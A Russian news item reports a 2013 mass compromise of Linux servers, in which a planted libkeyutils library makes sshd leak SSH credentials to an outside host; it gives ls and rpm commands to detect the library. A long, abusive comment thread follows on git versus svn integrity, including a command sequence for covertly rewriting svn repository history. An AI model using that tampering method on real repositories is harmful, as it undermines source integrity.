Третий день в Сети наблюдается (http://blog.solidshellsecurity.com/2013/02/18/0day-linuxcent.../) массовый взлом серверов на базе Linux. Имеется подозрение, что атака совершается через неисправленную 0-day уязвимость в одном из сетевых сервисов. Среди взломанных систем отмечаются серверы на базе CentOS и других дистрибутивов на основе пакетной базы RHEL, на которых установлены все доступные обновления. На многих взломанных системах используются панели управления cPanel, DirectAdmin и Plesk, пока не ясно могут ли они быть источником проникновения.
В результате атаки в системе неизвестным образом появляется файл /lib64/libkeyutils.so.1.9 (для 32-разрядных систем /lib/libkeyutils.so.1.9). После взлома процесс sshd начинает устанавливать подозрительные соединения: при входе на взломанный сервер по ssh, по протоколу UDP осуществляется отправка данных о введённых логине и пароле на 53 порт внешнего хоста. Кроме того, на сервер размещается код для участие в ботнете, используемом для рассылки спама и возможно для совершения дальнейших атак.
Маловероятно, что вектор атака связан с недавно обсуждаемой уязвимостю (http://www.opennet.me/opennews/art.shtml?num=36132) в ядре Linux (CVE-2013-0871), кроме всего прочего выявлены случаи взлома изолированного окружения, построенного на базе дистрибутива CloudLinux с включенным CageFS (http://docs.cloudlinux.com/index.html?cagefs.html). Среди атакованных система также отмечаются серверы с системой обновления ядра ksplice и серверы с sshd на нестандартном порту.
Для выявления факта взлома своей системы достаточно проверить наличие библиотеки /lib64/libkeyutils.so.1.9, не связанной ни с одним установленным пакетом (для 64-разрядных систем: ls -la /lib64/libkeyutils.so.1.9; rpm -qf /lib64/libkeyutils.so.1.9, для 32-разрядных: ls -la /lib/libkeyutils.so.1.9;rpm -qf /lib/libkeyutils.so.1.9).
URL: http://community.solidshellsecurity.com/topic/27344-0day-lin.../
Новость: http://www.opennet.me/opennews/art.shtml?num=36155
> На многих системах используются панели управления cPanel, DirectAdmin и Plesk.Закладка?
сломано сильно больше 3х колек. к сожалению. Счет пошел на десятки, если не сотни.
Если вы поинтересуетесь (чуть чуть погуглите) то таки найдете больше информации.с немного другой стороны - сказали что недавно проломили php - и через него залили архивчик с несколькими эксплойтами под ядро + на всякий случай - под гипервизоры, но так как там был не linux, то народ обломался.
скорее всего там уязвимость не sshd. так как Plesk, cPannel - предоставляют доступ шел юзерам только через песочницу (jail shell) там там /lib он не настоящий и r/o к тому же.
учитывая что там был cageFS - это значит надо выпрыгнуть из VFS namespace, что само по себе значительно сложнее банального выпрыгивания из chroot.так что вот так...
> но так как там был не linux, то народ обломался.А у фрибздоидов вон недавно не обломались - сервера они укладывали до разбирательства. Так что тоже не панацея как видим.
за то сервер не порутали, как у kernel org
)))
а да, никаких взломов нету, новость не про что, как всегда, линукс это только ядро, все уже это знают
> а да, никаких взломов нету,Никаких массовых покупок антивирусов нету. Никаких массовых (ежедневных) переустановок нету. Никаких лишних тревог нету. Живём не на пороховой бочке, как некоторые.
> за тоА точно не в то? И не под то?
> сервер не порутали, как у kernel org
Не больно какая разница, один хрен хост под реинсталл, т.к. мало ли кто, чего и где не заметил. Зато у пингвиноидов самое ценное что там было, т.е. сорец линя защищен DVCSом от левых вбросов коммитов задним числом в силу принципов его работы. У бсдоидов ничего подобного ясен фиг нет. И гарантировать целостность сорса и отсутствия там левых коммитов явно сложнее.
> а да, никаких взломов нету, новость не про что, как всегда, линукс
> это только ядро, все уже это знаютДа, линукс - это ядро. Ну так новость и написана "на базе Linux". Нигде не говорится что виновато именно ядро вроде. Мало ли - может троян ключи у виндоюзеров ворует. Или вообще в sshd дырка. Или там еще чего. Ядро туда каким боком?
>Зато у пингвиноидов самое ценное
> что там было, т.е. сорец линя защищен DVCSом от левых вбросов
> коммитов задним числом в силу принципов его работы. У бсдоидов ничего
> подобного ясен фиг нет. И гарантировать целостность сорса и отсутствия там
> левых коммитов явно сложнее.задам традиционный вопрос: сможешь это сделать с svn и рассказать как это делается ?;)
> задам традиционный вопрос: сможешь это сделать с svn и рассказать как это делается ?;)Давай лучше методом от противного: что на фундаментальном уровне помешает атакующему сделать это действие? В случае git все упрется в полный отъезд дерева хэшей, который будет дичайше палить подобную активность и вызовет неизбежное изучение столь странной ситуации. А в svn?
А то так можно дойти до состояния "ой, да ну, зачем проверять подписи пакетов? А как атакующий файлы поменяет?!". Хотя вроде у вас оно как-то так и происходит, не? :)
>> задам традиционный вопрос: сможешь это сделать с svn и рассказать как это делается ?;)
> Давай лучше методом от противного: что на фундаментальном уровне помешает атакующему сделать
> это действие? В случае git все упрется в полный отъезд дерева
> хэшей, который будет дичайше палить подобную активность и вызовет неизбежное изучение
> столь странной ситуации. А в svn?
> А то так можно дойти до состояния "ой, да ну, зачем проверять
> подписи пакетов? А как атакующий файлы поменяет?!". Хотя вроде у вас
> оно как-то так и происходит, не? :)давай без давай? по шагам, что нужно сделать в случае с svn для "левых вбросов коммитов задним числом". упрощу задачу: предположим, что даже root на машинку с репо есть у тебя. итак, жду пошаговую инструкцию по внедрению.
пока только молитвы торвалцу вижу я со стороны поклонников git по поводу этого дела и ничего больше.
> пока только молитвы торвалцу вижу я со стороны поклонников git по поводу
> этого дела и ничего больше.В общем то "молитва" достаточно простая: я вижу что НЕ даст это сделать на уровне алгоритмики процесса. Это просто, понятно, логично и вполне убедительно. Поскольку файлы имеют такое свойство что их можно перезаписывать, а оптимизм в секурити недопустим, я не вижу никаких оснований полагать что по умолчанию хакер чего-либо не сможет. Чтобы он чего-то не смог - что-то должно ему явным образом помешать это сделать. В случае с гитом мне понятно что испортит ему планы. В случае с SVN - нет.
P.S. и кстати, а если я скажу что "возможно слелать на луну" - от меня будет затребован мануал по строительству лунной ракеты для доказательства этого тезиса?
>> пока только молитвы торвалцу вижу я со стороны поклонников git по поводу
>> этого дела и ничего больше.
> В общем то "молитва" достаточно простая: я вижу что НЕ даст это
> сделать на уровне алгоритмики процесса. Это просто, понятно, логично и вполне
> убедительно. Поскольку файлы имеют такое свойство что их можно перезаписывать, а
> оптимизм в секурити недопустим, я не вижу никаких оснований полагать что
> по умолчанию хакер чего-либо не сможет. Чтобы он чего-то не смогтак елки-палки. все же просто.
svnadmin create /tmp/c00lrepo
в репо пихаешь файликов несколькими коммитами, пытаешься заменить файл. этого я от тебя жду;-) без "я вижу" и "я не вижу". нужны факты. команда1...командаN. рез-т = левый файл в репо, так чтобы это стало незаметно для меня, делающего update оттуда.> - что-то должно ему явным образом помешать это сделать. В случае
> с гитом мне понятно что испортит ему планы. В случае с
> SVN - нет.
> P.S. и кстати, а если я скажу что "возможно слелать на луну"
> - от меня будет затребован мануал по строительству лунной ракеты для
> доказательства этого тезиса?ну был такой персонаж.. с мельницами ветряными боролся. почему-то кажется, что ваше божество с ним тут схожи. опровергнешь, на примере svn?;-)
svnadmin dump repo > dump; hack dump; rm -rf repo; svnadmin create repo; svnadmin load repo < dump;
> svnadmin dump repo > dump; hack dump; rm -rf repo; svnadmin create
> repo; svnadmin load repo < dump;ты себе примерно хотябы представляешь сколько времени оно будет работать? даже тупой убунтовод заметил бы, что на хосте активность левая.
это "раз"
два: готов выслушать подробнее про "hack dump"
чтобы более предметно, на примере "Revision-number: 2" из дампа (заодно расскажи сколько часов и места понадобилось, для dump.)
для ports, например, до 60000 ревизии за 5 минут только дошло из 312610. при этом размер дампа 1гб получился. итого, грубо говоря, у тебя есть 5 гиг дампа. чего дальше?;-)
> ты себе примерно хотябы представляешь сколько времени оно будет работать?Начались жиденькие отмазки...
>> ты себе примерно хотябы представляешь сколько времени оно будет работать?
> Начались жиденькие отмазки...ну почемуже, чуть ниже я написал, сколько оно у меня на примере ports работало, на тачке без raid. пускай это будет "1 час"
внедри же пакость! #471
> тебя есть 5 гиг дампа. чего дальше?;-)А чем 5 гиг дампа так страшны? У меня есть файлики и на 200 гигз. И?
> svnadmin dump repo > dump; hack dump; rm -rf repo; svnadmin create
> repo; svnadmin load repo < dump;в #466 я ошибся.. "слегка"
[tiger@svn]~%\time svnadmin dump /usr/local/repositories/freebsd/ports/ > ~/ports-dump
[skipped]
* Dumped revision 312610.
3441.51 real 2245.55 user 503.73 sys
[tiger@svn]~%ll -h ports-dump
-rw-r--r-- 1 tiger wheel 19G Feb 20 10:21 ports-dump
итак, нужно в Revision-number: 4 в тот пердокод который там встроить пакость. твои действия: .. ?
> тебя жду;-) без "я вижу" и "я не вижу". нужны факты.Ну вот я потому и спрашиваю: должен ли я предоставить полный мануал по сборке лунной ракеты если я полагаю что можно слетать на Луну?
> так елки-палки. все же просто.
> svnadmin create /tmp/c00lrepo
> в репо пихаешь файликов несколькими коммитами, пытаешься заменить файл. этого я от
> тебя жду;-) без "я вижу" и "я не вижу". нужны факты.
> команда1...командаN. рез-т = левый файл в репо, так чтобы это стало
> незаметно для меня, делающего update оттуда.Я такое штатно делал, когда добавлял в 1 ревизию (их уже 3000 было) каталог транк и перетягивал туда всё. Дамп, vi, замена регэкспом, сохранить, влить. Правда в 1.6, а в 1.7 появились md5, и их было влом пересчитывать для всех файлов. Но за пару дней я мог бы написать скрипт, который вносит правки, пересчитывает длины строк итд.
> Не больно какая разница, один хрен хост под реинсталл, т.к. мало ли
> кто, чего и где не заметил. Зато у пингвиноидов самое ценное
> что там было, т.е. сорец линя защищен DVCSом от левых вбросов
> коммитов задним числом в силу принципов его работы.Увели пароль админа серера с правом коммита в DVCS? Что помешает злоумышленнику закомитеть совершенно стандартным образом патчик? Разраб от которого закоммители тут же это увидит? - да не смешите мои тапочки. Другие увидят? - еще смешнее.
> Увели пароль админа серера с правом коммита в DVCS? Что помешает злоумышленнику
> закомитеть совершенно стандартным образом патчик? Разраб от которого закоммители тут же
> это увидит? - да не смешите мои тапочки. Другие увидят? -
> еще смешнее.Ну, конечно, висит левый патч, и все делают вид, что так и задумано.
Я в программах, на которые подписан на github/bitbucket, иногда подолгу патчи созерцаю. Хотя я вообще мало что понимаю, что в этих цветных логах диффов написано.
А тот, кто это себе применять будет, особенно если это кто-то из разработчиков, обязательно diff посмотрит, чтобы увидеть, что вообще пришло. А то это бред получится - в проект постоянно что-то добавляется, а разработчику вообще побоку, что это - он своё пишет и на других внимание не обращает, правки не смотрит, pull request-ы принимает с закрытыми глазами.
Ах да, я и забыл, вы же из реальности виндузятников. Там такое поведение - норма?
>> Увели пароль админа серера с правом коммита в DVCS? Что помешает злоумышленнику
>> закомитеть совершенно стандартным образом патчик? Разраб от которого закоммители тут же
>> это увидит? - да не смешите мои тапочки. Другие увидят? -
>> еще смешнее.
> Ну, конечно, висит левый патч, и все делают вид, что так и
> задумано.Когда эти патчей в день коммитится достаточно много и тем более не от новичка - пропустить можно, да и не будут пихать патч прямо с явным кодом бекдора.
> Я в программах, на которые подписан на github/bitbucket, иногда подолгу патчи созерцаю.
> Хотя я вообще мало что понимаю, что в этих цветных логах
> диффов написано.медитируешь? думаешь есть от этого толк?
> А тот, кто это себе применять будет, особенно если это кто-то из
> разработчиков, обязательно diff посмотрит, чтобы увидеть, что вообще пришло. А то
> это бред получится - в проект постоянно что-то добавляется, а разработчику
> вообще побоку, что это - он своё пишет и на других
> внимание не обращает, правки не смотрит, pull request-ы принимает с закрытыми
> глазами.в крупных проектах разные коммитеры отвечают за разные подсистемы, не факт, что один наблюдает за другим, в этом нет необходимости, плюс в коде ты не найдешь:
back(int door)
{
char *secret;
...> Ах да, я и забыл, вы же из реальности виндузятников. Там такое
> поведение - норма?начинающий убунтовод привед!
ты получил уже получил сидюк с новой убунтой, мне марк, почему-то не хочет слать, говорит денег у него нету... михалков все забрал видимо...
> Когда эти патчей в день коммитится достаточно много и тем более не
> от новичка - пропустить можно, да и не будут пихать патч
> прямо с явным кодом бекдора.Виндузятник - это всегда любо дорого посмотреть. Вот такущие щели в безопасности, регулярные миллионы новых пользователей ботнетов, иногда по восьмому кругу, принципиальная невозможность всё это исправить, отсутствие исходных кодов...
А они всё рассуждают о ситуациях "а вдруг всех разработчиков настигнет массовый маразм, и что будет тогда". Ничего не будет. Кроме того, для того и есть стабильные дистрибутивы, где исходники одни и те же всю жизнь дистрибутива, и где ничего не добавляют, зато старое ежедневно на практике тестируют.
Сколько и каких патчей коммитится в проприетарные проекты - даже близко нельзя посчитать. ВОТ что вас волновать должно. Если это для вас проблема - вы уже давно с плакатами должны стоять "верните нам наши исходники, созданные на наши деньги", а не рассуждать о теоретических опасностях. Или вас это волнует только в свободных проектах, а в проектах, которые используете вы, не волнует вообще никак? Тогда это безнадёжный случай.
>> Когда эти патчей в день коммитится достаточно много и тем более не
>> от новичка - пропустить можно, да и не будут пихать патч
>> прямо с явным кодом бекдора.
> Виндузятник - это всегда любо дорого посмотреть. Вот такущие щели в безопасности,
> регулярные миллионы новых пользователей ботнетов, иногда по восьмому кругу, принципиальная
> невозможность всё это исправить, отсутствие исходных кодов...Ты форумом не ошибся? Если нет, то точно ошибся кнопкой "Ответить".
По делу есть, что сказать?
> Ты форумом не ошибся? Если нет, то точно ошибся кнопкой "Ответить".
> По делу есть, что сказать?Сказать то, что вам нравится, у меня нету. Если кому-то когда-то вбили мировоззрение потребительского быдла, если в его мире "сводобное" хуже "несвободного", если в его мире играть в 3д-блокбастеры до красных глаз - это хорошо, а то, что кто-то делает для других людей и просто так - тянет на, как минимум, полновесное оскорбление...
... и самое главное, те, кто не понимая сути свободного, всё равно возвращается и возвращается на опеннет, только с одной целью, похамить и самоутвердиться...
... тот ничего не поймёт. Нельзя из урода, думающего только о себе, и свои проблемы возвеличивающие до вселенских масштабов, заставляя всех с ними соглашаться, сделать человека. А если и можно, то мне и науке такие способы неизвестны.
Поэтому с моей стороны несколько странно было бы ждать, что существо, которое умеет только хамить и выражать вечное недовольство, внезапно прекратит хамить и выражать вечное недовольство. Или начнёт понимать, в чём смысл свободного движения. Или хотя бы перестанет переходить на опеннет (то есть, перестанет вести себя, как престарелая девственница, которому на словах всё это жутко не нравится, но он ПРОДОЛЖАЕТ И ПРОДОЛЖАЕТ сюда приходить).
Тут всё просто - если человек на тематическом форуме не разделяет тематики этого форума, то он дурак. И пришёл на форум только для того, чтобы мешать другим. И поэтому против такого все средства хороши, и каждый, кто плюнет ему в рожу, будет только прав - ведь именно этого вы и хотели, правда? Раз вы так себя ведёте, значит именно такого отношения вы и хотите? И вы его и получите, вас всегда тут будут дрочить. Потому что иного способа излечить вас от неполноценности - нет.Жаль, что вы не слова не поймёте из того, что я написал. Иначе вы бы осознали, как нелепо вы выглядите, приходя на опеннет со своим усталым.
> Иначе вы бы осознали, как нелепо вы выглядите, приходя на опеннет
> со своим усталым.ну для начала у меня он не усталый :), хотя натруженный, да.
> Сказать то, что вам нравится, у меня нету.
Где я просил что бы ты мне сказал, что мне нравится?
читаю это:
> возвращается и возвращается на опеннет, только с одной целью, похамить и
> самоутвердиться...затем это:
>Нельзя из урода, думающего только о себе
>он дурак
> излечить вас от неполноценности - нет.ты конечно же о себе говорил, правильно? самокритика это хорошо, да, но иди плакаться в службу психологической помощи.
предметно что-нибудь есть? нет? гуляй.
> предметно что-нибудь есть? нет? гуляй.Как вам можно объяснить, что никаких левых коммитов ниоткуда появиться не может, вероятность совсем мизерная, и это подтвержает практика - если вы считаете всех разработчиков тупыми и некомпетентными, для которых git/hg/bzr/fossil это неведома штука, откуда постоянно какие-то лишние файлы вываливаются, глаза бы их не видели? Что могут сделать факты против такого слепого поклонения собственной фантазии?
Можно только посчитать вас законченным дурачком-мудачком, что я и делаю, хоть и без удовольствия.
>> предметно что-нибудь есть? нет? гуляй.
> Как вам можно объяснить, что никаких левых коммитов ниоткуда появиться не может,
> вероятность совсем мизерная, и это подтвержает практика - если вы считаете
> всех разработчиков тупыми и некомпетентными, для которых git/hg/bzr/fossil это неведома
> штука, откуда постоянно какие-то лишние файлы вываливаются, глаза бы их не
> видели? Что могут сделать факты против такого слепого поклонения собственной фантазии?Вероятность увода приват кея от ссх тоже мизерная, но тем ни менее, вам показать крупные проекты, которые были взломаны подобным образом или сами вспомните?
>>> предметно что-нибудь есть? нет? гуляй.
>> Как вам можно объяснить, что никаких левых коммитов ниоткуда появиться не может,
>> вероятность совсем мизерная, и это подтвержает практика - если вы считаете
>> всех разработчиков тупыми и некомпетентными, для которых git/hg/bzr/fossil это неведома
>> штука, откуда постоянно какие-то лишние файлы вываливаются, глаза бы их не
>> видели? Что могут сделать факты против такого слепого поклонения собственной фантазии?
> Вероятность увода приват кея от ссх тоже мизерная, но тем ни менее,
> вам показать крупные проекты, которые были взломаны подобным образом или сами
> вспомните?лучше показать - и напомнить как взломали Fedora. видимо этого взлома не существовало в природе?
kernel.org не ломали - так что он месяцы валялся в downtime..
А "исправления" которые сделали в Debian - так аукнулись всему интернету - подарив самый большой удар по криптографии openssl - что можно просто не шифовать данные.
так у них это единственный шанс по жизни - попытаться выглядеть крутым спецом. ничего другого они делать просто не умеют, кроме надувания сопливых пузырей. ни любимой работы, ни любимых хобби.
терзаемые комплексами они лезут в интернет не за ответами, нет! они просто пытаются вырасти в глазах других. беда в том, что у некоторых других есть глаза, мозги, знания и навыки. зачастую - навыки работы минимум на нескольких ОС: винды, макось, линукс. в отличие от задирающих нос сопленадувателей.
а сколько нервов и времени сэкономил при безвирусье. плюс денег на апдейты антивирусников - ежегодно заплати. не сильно много, конечно. полста зелени в год. но так оно набегает, по мелочи.линуксу нужна настройка. а виндам нужен уход. причем, чем раньше и дальше винда уйдёт, тем лучше.
мудак cannot into dvcs.
> мyдак cannot into dvcs.Кэп суров но справедлив. Как обычно. Я поражаюсь насколько у некоторых имбецилов мышление централизованными VCS испохаблено. Они не могут понять что хост кернелорга в этой схеме - ни разу не святой грааль, в отличие от централизованных VCS :)
>> мyдак cannot into dvcs.
> Кэп суров но справедлив. Как обычно. Я поражаюсь насколько у некоторых имбецилов
> мышление централизованными VCS испохаблено. Они не могут понять что хост кернелорга
> в этой схеме - ни разу не святой грааль, в отличие
> от централизованных VCS :)и они ни как не синхронятся, а если и синхронятся, то все всё читают и проверяют?
> и они ни как не синхронятся, а если и синхронятся,Они конечно синхронятся. Вопрос лишь в том как. Вот эта "незначительная" деталь все как раз и портит.
>> и они ни как не синхронятся, а если и синхронятся,
> Они конечно синхронятся. Вопрос лишь в том как. Вот эта "незначительная" деталь
> все как раз и портит.чего она портит? все всё при синхроне начинают читать и проверять?
> чего она портит? все всё при синхроне начинают читать и проверять?В данной схеме вообще нет никакого синхрона с каким-либо "центром вселенной". Есть синхрон распределенной команды разработчиков между собой по неким правилам. А кернелорг - лишь некая копия репов для удобства. Вы собственно можете получить копию репов с правом коммита сделав элементарный git clone. Вот правда никто не обещает что ваши коммиты кто-то куда-то потом возьмет. Это в централизованых VCS все слепо верят одному центральному серваку. А в dvcs такого вообще нет.
>> чего она портит? все всё при синхроне начинают читать и проверять?
> В данной схеме вообще нет никакого синхрона с каким-либо "центром вселенной". Есть
> синхрон распределенной команды разработчиков между собой по неким правилам. А кернелорг
> - лишь некая копия репов для удобства. Вы собственно можете получить
> копию репов с правом коммита сделав элементарный git clone. Вот правда
> никто не обещает что ваши коммиты кто-то куда-то потом возьмет. Это
> в централизованых VCS все слепо верят одному центральному серваку. А в
> dvcs такого вообще нет.Это понятно, вопрос в том, что портит эта "незначительная" деталь?
> Это понятно, вопрос в том, что портит эта "незначительная" деталь?Судя по всему - вам нихрена не понятно. Поясняю: то что на кернелорге лежит копия репов еще не значит что разработчики будут из нее мержить изменения к себе. Что делает коммит в такие репы достаточно инфантильным. "На третий день Зоркий Глаз заметил что у сарая нет стены."
вот, в ответе опять. я некоторое время пояснять пытался, но устал дико. вообще, дураков надо или посылать, или с ними соглашаться. попробую делать именно так.
> Увели пароль админа серера с правом коммита в DVCS?При таких познаниях лучше заниматься аналитикой в какой-нибудь иной отрасли, где ваш ламеризм будет менее очевиден. В этой фразе столько ошибок что я даже не знаю с какого бока начать. Вижу минимум 1 проблему: у вас стиль мышления искореженный централизованными VCS. Понимаете, кернелорг в этой схеме не есть священный грааль. Он всего лишь 1 из репов. Такой же как у каждого разработчика.
>> Увели пароль админа серера с правом коммита в DVCS?
> При таких познаниях лучше заниматься аналитикой в какой-нибудь иной отрасли, где ваш
> ламеризм будет менее очевиден. В этой фразе столько ошибок что
> я даже не знаю с какого бока начать. Вижу минимум 1
> проблему: у вас стиль мышления искореженный централизованными VCS. Понимаете, кернелорг
> в этой схеме не есть священный грааль. Он всего лишь 1
> из репов. Такой же как у каждого разработчика.прямо так живенько вырисовывается картинка с хомячками, каждый получил свою семечку, разбежались по углам, повернулись друг к другу задом и точат и точат...
> прямо так живенько вырисовывается картинка с хомячками, каждый получил свою семечку, разбежались
> по углам, повернулись друг к другу задом и точат и точат...Ну вот хомячиный умишко никак не может понять - что за D такое в слове DVCS. Они почему-то думают что есть центральная кормушка с семечками, являющаяся каким-то непререкаемым авторитетом. Что, мягко говоря, не соответствует действительности.
>> прямо так живенько вырисовывается картинка с хомячками, каждый получил свою семечку, разбежались
>> по углам, повернулись друг к другу задом и точат и точат...
> Ну вот хомячиный умишко никак не может понять - что за D
> такое в слове DVCS. Они почему-то думают что есть центральная кормушка
> с семечками, являющаяся каким-то непререкаемым авторитетом. Что, мягко говоря, не соответствует
> действительности.да нет, хомячки прекрасно понимают, что семечки может собирали с разных полей, и даже везли разными поездами, но последняя миля у них была в одном кульке, а значит и слияние было...
> в одном кульке, а значит и слияние было...Мержи конечно происходят, только вот с чего дебилоиды взяли что кернелорг является центром вселенной - совершенно не понятно. Почему-то при отпадении оного мержинг и синхронизация опять же не прекратились. Не знаете почему? И главное - как же это господа разработчики все это делали, если "центральному серверу" вообще каюк? :)
даже хомячки понимают - что архив с так называемым релизом - почему-то режутся из одного места, и разработчики простят некого Торвалдьса сделать pull и забрать изменения в одно _центральное_ место.
То есть полная копия есть только в одном месте..Мы конечно понимаем что потом можно сделать обратную синхронизацию, но это не отменяет факта что синхронизироваться будут с kernel.org а не со всеми 100 тысячь питсот репозиториями тех кто делал патчи.
Так что там о децентрализованности?
> даже хомячки понимают - что архив с так называемым релизом - почему-то
> режутся из одного места, и разработчики простят некого Торвалдьса сделать pull
> и забрать изменения в одно _центральное_ место.
> То есть полная копия есть только в одном месте..git help tag
hg help tag
fossil help tagможет, хватит уже сверкать дебилизмом?
может хватит сверкать дибилизмом - что бы понять что что бы tag разошелся с головы дерева к ветвям - надо что бы в одном месте его поставили. и это место - комп торвальдса.Да, потом уже он будет на других местах - но изначально все пойдет из одной точки.
> может хватит сверкать дибилизмом - что бы понять что что бы tag
> разошелся с головы дерева к ветвям - надо что бы в
> одном месте его поставили. и это место - комп торвальдса.Ахуенное открытие. Нобелевская премия, не иначе.
Я ещё одно подскажу. Чтобы исходник появился, его нужно написать в одном месте. И чтобы он разошёлся с головы дерева к ветвям, нужно, чтобы в одном месте его написали. И это место - комп разработчика.
Спасибо за бред. Это даже круче, чем я ожидал.
да да, и объясни мне сирому как исходник с компа одного разработчика появляется на компе другого?
Без обмена этим на компе торвальдса.
где сливаются все изменения.
Оно вообще в курсе, как происходит разработка ядра и как там код летает? Ёлы-палы, ну нельзя же настолько откровенную чушь нести...
> Оно вообще в курсе, как происходит разработка ядра и как там код
> летает? Ёлы-палы, ну нельзя же настолько откровенную чушь нести...да да. чушь несете вы. Я все еще надеюсь услышать - как святой дух разносит по всему миру тэги из дерева торвальдса - которые отмечают точку релиза.
> как святой дух разносит по всему миру тэги из дерева торвальдсаНу не святой дух, а git. Массой разных способов. Вплоть до флоппинета, если оно кому-то надо. С хрена ли кернелорг при этом какой-то там священный грааль? И как тогда разработчики разрабатывали пока кернелорг был в дауне, а? :)
напомню - что Торвальдс сделал тогда новый святой грааль - но на github.
но грааль никуда не пропал - как была центральная точка, так и осталась.
Раз признаешь, что сирый (убогий, кстати, тоже) - так и быть, объясню. У Торвальдса собираются изменения только от маинтайнеров подсистем. У них у всех, как и у Торвальдса, репозитории свободно доступны на чтение всему миру со всеми своими ветками и любой заинтересованный разработчик может посмотреть, что делает сосед. И смотрит - как минимум в тех частях, что рядом с его кодом, но часто - и просто потому что какая-то проблема интересна и хочется видеть, как её решают. Да и между рядовыми разработчиками ветки летают только так. И после пулла разработчик изменения смотрит - они могут и его деятельность затронуть. А уж если попытаться сделать pull того, что изменилось с предыдущего пулла (хоть подменой какой, хоть глупым ребейзом) - гит материться будет достаточно громко, чтобы на это обратили внимание.
>[оверквотинг удален]
> всех, как и у Торвальдса, репозитории свободно доступны на чтение всему
> миру со всеми своими ветками и любой заинтересованный разработчик может посмотреть,
> что делает сосед. И смотрит - как минимум в тех частях,
> что рядом с его кодом, но часто - и просто потому
> что какая-то проблема интересна и хочется видеть, как её решают. Да
> и между рядовыми разработчиками ветки летают только так. И после пулла
> разработчик изменения смотрит - они могут и его деятельность затронуть. А
> уж если попытаться сделать pull того, что изменилось с предыдущего пулла
> (хоть подменой какой, хоть глупым ребейзом) - гит материться будет достаточно
> громко, чтобы на это обратили внимание.:-) смешной вы. Локальные ветки они у каждого свои. А что касатеся кого могут затронуть - если вы так уж пытаетесь кичиться разработкой ядра. То вспомините правило - что изменения в то что затронул делает тот кто меняет.
И еще дальше вспоминет - что то что называют "релиз" не существует нигде в другом месте - только у торвальдса. А разговор напомню идет о релизе - а он такая сволочь - что может быть только в одном месте..
А что касается ругани git при pull/rebase - так они возникают у торвальдса
Да да мы все помним письма в lkml - please pull from .....
а не берут маинтейнеры и вливают сами по себе.В любом случае у любого отдельного человека - есть только часть - а итоговый результат - и эталонная точка которой привещивается tag - делается только 1 человеком - Торвальдсом.
_ОДНИМ_А дальше эта метка (тэг) расползается по всем копиям (клонам).
Я достаточно объяснил - что тэг релиза не может возникнуть просто так на всех машинах пользователей без синхронизации с компьютером Торвальдса? А без этого тэга называть что-то релизом - смешно.
> И еще дальше вспоминет - что то что называют "релиз" не существует
> нигде в другом месте - только у торвальдса.Это может придумать только дятел который DVCS видел только на картинках. Нет, мержинг конечно делает Торвальдс, но это не значит что результат только у него.
>> И еще дальше вспоминет - что то что называют "релиз" не существует
>> нигде в другом месте - только у торвальдса.
> Это может придумать только дятел который DVCS видел только на картинках. Нет,
> мержинг конечно делает Торвальдс, но это не значит что результат только
> у него.и DVCS тут не причем, то же самое может любая VCS, рассказать вам, например, про svn co?
сдается мне, что вы ничего не видели кроме git-а.
>>> И еще дальше вспоминет - что то что называют "релиз" не существует
>>> нигде в другом месте - только у торвальдса.
>> Это может придумать только дятел который DVCS видел только на картинках. Нет,
>> мержинг конечно делает Торвальдс, но это не значит что результат только
>> у него.
> и DVCS тут не причем, то же самое может любая VCS, рассказать
> вам, например, про svn co?
> сдается мне, что вы ничего не видели кроме git-а.Если центральный сервер svn скомпроментирован, то он тебе и будет на чекаут выдавать поддельные данные, и заметить это гораздо сложнее.
А в git у всех будут идентичные коммиты, и если это тэг '3.2.8', значит у всех и будет этот 3.2.8, идентичный натуральному. В Европе и лучших домах Филадельфии, а также у меня дома под небольшой нагрузкой - вообще нет никакого "архива с релизом", а есть только архив, который автоматически получается через веб-интерфейс hg или rhodecode с помощью hg archive. И точно такой же архив может быть сгенерирован с любого клона, по ревизии/тэгу.
Суть в том, что у всех данные идентичные, и не может быть никаких "внезапных коммитов без истории". Нет, можно, конечно, написать "linux mustdie", но с таким же успехом можно написать это на стене, или, вон, как масдай - у себя на лбу. Никто не пропустит плохой коммит. А если вдруг так случится, что кто-то ответственный будет похищен агентами Баллмера и под пытками внесёт такой коммит - то его увидят все, моментально, он отразится во всех логах. Нельзя никак втащить коммит тайно, незаметно, или подменить историю - все коммиты на виду, и люди обычно делают git diff, чтобы посмотреть, что же там за патчик пришёл.
Но опять же - это какая-то космическая вероятность. Коммит от невесть кого вызовет подозрение сразу, а чтобы сделать неподозрительный коммит - намного дешевле просто перестрелять всех лидеров opensource и им сочувствующих, и этим внести смуту.
> Без обмена этим на компе торвальдса.А кернелорг тут при чем? Ну да, несомненно, у разработчиков есть компьютеры. Они на них что-то делают. Но эти компьютеры не являются кернелоргом. Ну что, обтекайте теперь, если столь простой момент до вас так туго допирает.
>> Без обмена этим на компе торвальдса.
> А кернелорг тут при чем? Ну да, несомненно, у разработчиков есть компьютеры.
> Они на них что-то делают. Но эти компьютеры не являются кернелоргом.
> Ну что, обтекайте теперь, если столь простой момент до вас так
> туго допирает.Слушай обтекатель, прежде чем писать, нужно читать, фирштейн?
http://www.opennet.me/openforum/vsluhforumID3/88727.html#341
> Слушай обтекатель, прежде чем писать, нужно читать, фирштейн?Я то ферштейн. А вот вы к себе это примените еще, да? То орали о том что взлом кернелорга все нагибает, то оказывается что он всем похрену и ломать если что и надо - то конкретных разработчиков уже. Надо же, какое эпичное прозрение у этих, которые cannot into dvcs.
>> Слушай обтекатель, прежде чем писать, нужно читать, фирштейн?
> Я то ферштейн. А вот вы к себе это примените еще, да?
> То орали о том что взлом кернелорга все нагибает, то оказывается
> что он всем похрену и ломать если что и надо -
> то конкретных разработчиков уже. Надо же, какое эпичное прозрение у этих,
> которые cannot into dvcs.не... читать ты точно не умеешь...
> То есть полная копия есть только в одном месте..Надо же быть таким идиотом с искалеченным централизацией мозгом.
1) А это, вы уверены что Торвальдс у лично вас сделает pull с вашим трояном? Вы такой убедительный чувак, который к тому же не боится засрать себе репутацию на весь остаток жизни?
2) Вообще-то гит на то и DVCS что у каждого на руках при желании есть именно полная копия со всеми наворотами. Со всеми коммитами, тэгами, бранчами и чем там еще. Если этого хотелось - оно таки у вас будет. И по ним всем можно шариться наздоровье, переключаясь на то или иное состояние. Получив это в состоянии "как видел разработчик в такой-то момент". И все это - без сливания на каждый пук кучи мегазов с ремотных серверов.Нету там разве что того над чем разработчики работают ну вот прямо сию секунду и еше не синхрили между собой.
> 1) А это, вы уверены что Торвальдс у лично вас сделает pull
> с вашим трояном? Вы такой убедительный чувак, который к тому же
> не боится засрать себе репутацию на весь остаток жизни?вопрос не про нас, а про разработчиков. некий разработчик не в курсе, что он сломан.
